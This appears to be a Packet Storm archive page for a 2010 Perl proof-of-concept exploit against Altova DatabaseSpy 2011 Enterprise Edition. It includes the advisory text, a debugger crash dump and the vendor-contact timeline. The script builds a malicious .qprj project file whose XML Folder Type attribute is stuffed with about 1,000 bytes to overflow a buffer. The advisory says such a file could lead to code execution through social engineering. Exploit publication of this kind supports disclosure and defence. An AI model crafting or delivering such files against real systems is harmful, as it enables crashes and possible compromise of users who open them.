what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Altova DatabaseSpy 2011 Buffer Overflow

Altova DatabaseSpy 2011 Buffer Overflow
Posted Oct 22, 2010
Authored by LiquidWorm | Site zeroscience.mk

The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer overflow / memory corruption vulnerability when handling project files (.qprj).

tags | exploit, overflow
SHA-256 | 147a401924e74a73b35e7412da0eb4ebc2f544df74ee1b296794ec6609e0edbf

Altova DatabaseSpy 2011 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundry checking of some XML tag
# property values, ex: <Folder FolderName="SQL" Type="AAAAAAA..../>" (~1000 bytes).
# This can aid the attacker to execute arbitrary machine code in the context of an
# affected node (locally and remotely) via file crafting or computer-based social
# engineering.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#----------------------------------------------------------------------------------#
#
# (342c.37c0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016
# eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for
# DatabaseSpy.exe - DatabaseSpy+0x20b83:
# 00420b83 663b02 cmp ax,word ptr [edx] ds:0023:56413f2e=????
#
#----------------------------------------------------------------------------------#
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status: [17.10.2010] Vulnerability discovered.
# [17.10.2010] Initial contact with the vendor with sent PoC files.
# [21.10.2010] No reply from vendor.
# [22.10.2010] Public advisory released.
#
#
# Advisory ID: ZSL-2010-4971
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php
# Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt
#
#
# 17.10.2010
#

use strict;
system cls;


sub header()
{
print "
@=---===---===---===---===---===---===---===---=@
| |
| Proof Of Concept PERL script for |
| |
| Altova DatabaseSpy 2011 (Enteprise Edition) |
| |
| |
| |
| |
| --- |
| |
| Copyleft (c) 2010 |
| |
| Zero Science Lab - http://www.zeroscience.mk |
| |
@=---===---===---===---===---===---===---===---=@
\n\n";
}

my $FILENAME = "DEATH_FROM_ABOVE.qprj"; #DatabaseSpy Project File

my $PAYLOAD = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". #48
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; #1008B

#21

my $PROJECT = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\xA<!-".
"- DatabaseSpy Project File -->\xA<Project Vers".
"ion=\"2\" Expanded=\"Yes\" Type=\"Root\" Title=".
"\"test\">\xA\x9<Folder FolderName=\"Data Sources".
"\" Type=\"DataSourceFolder\"/>\xA\x9<Folder Fol".
"derName=\"SQL\" Type=\"SQLRootFolder\" database".
"_kind=\"Unknown\" datasource=\"Offline\" descrip".
"tion=\"Store and organize SQL files for this pro".
"ject.\" blockingstrategy=\"semi\"/>\xA\x9<Folder".
" FolderName=\"Design\" Type=\"$PAYLOAD\" databas".
"e_kind=\"Unknown\" datasource=\"Offline\" descri".
"ption=\"I LOVE VERONICA CORNINGSTONE.\"/>\xA\x9<".
"Folder FolderName=\"Data Diff\" Type=\"DataDiffR".
"ootFolder\"/>\xA\x9<Folder FolderName=\"Schema D".
"iff\" Type=\"Schema DiffRootFolder\"/>\xA\x9<Fol".
"der FolderName=\"Favorites\" Type=\"FavoriteFold".
"er\"/>\xA</Project>\xA";

sub code()
{
system ("color 3"); #~!@#$%^&*()_+|<>?:"{}=-`';/.,0
open qprj, ">./$FILENAME" || die "\nCan't open #$_@
$FILENAME: $!"; print "\n (1) "; system("pause"); #
print qprj $PROJECT; print "\n (2) Buffering mali".
"cious format file . . .\r\n"; sleep 2; close qprj;
print "\n (3) File $FILENAME created successfully".
"!\n"; sleep 2; system ("color \x44"); sleep 1; #.%
print "\n (4) And the color is changed.\n";
}

print "\n";
header();
code();

#EOF
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close